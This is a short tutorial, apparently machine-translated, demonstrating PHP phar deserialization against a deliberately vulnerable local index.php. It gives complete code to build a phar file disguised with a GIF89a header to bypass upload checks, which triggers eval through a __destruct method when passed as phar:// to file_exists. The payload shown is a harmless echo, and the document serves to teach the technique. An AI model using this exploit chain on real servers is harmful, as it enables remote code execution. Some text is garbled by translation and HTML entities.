The process of testing the environment is roughly as follows: compose the phar file and modify it to upload any suffix to the server. By controlling the file operation function parameters in index.php, setting the parameters to phar://upload the file name can lead to command execution.
index.phpThe code is as follows
<?php class foo { var $ha = 'echo "ok";'; function __destruct() { eval($this->ha); } } $ka = $_GET['file']; file_exists($ka);
It can be seen that foo is a dangerous class, and when the dangerous object is de serialized, it will cause the command to execute. But in index.php, there is only one file_exists () file operation function.
Code for constructing phar files:
<?php //Put the object that is to be de serialized here. class foo { var $ha = 'echo "ok";'; function __destruct() { eval($this->ha); } } //Generating corresponding objects that can be used $o = new foo();
$o->ha='echo "error";'; @unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //Set stub, add GIF header to cheat detection. $phar->setMetadata($o); //Save custom meta-data to manifest $phar->addFromString("test.txt", "test"); //Add files to be compressed/ / signature automatic calculation $phar->stopBuffering(); ?>
Run this file, generate the available phar. phar file, and modify the suffix to GIF (ps: can be modified to any suffix, but because a GIF89a header is masked here, so I’m modified to gif, and the header features can be modified arbitrarily, but & LT;?Php_u HALT_COMPILER(); T & gt; this section does not move, it is the PHP flag to identify the phar file flag, for convenience, I moved the file directly to the index.php directory.
Access index.php and set the file parameter to phar://phar.gif command successfully.
Reference article: https://paper.seebug.org/680/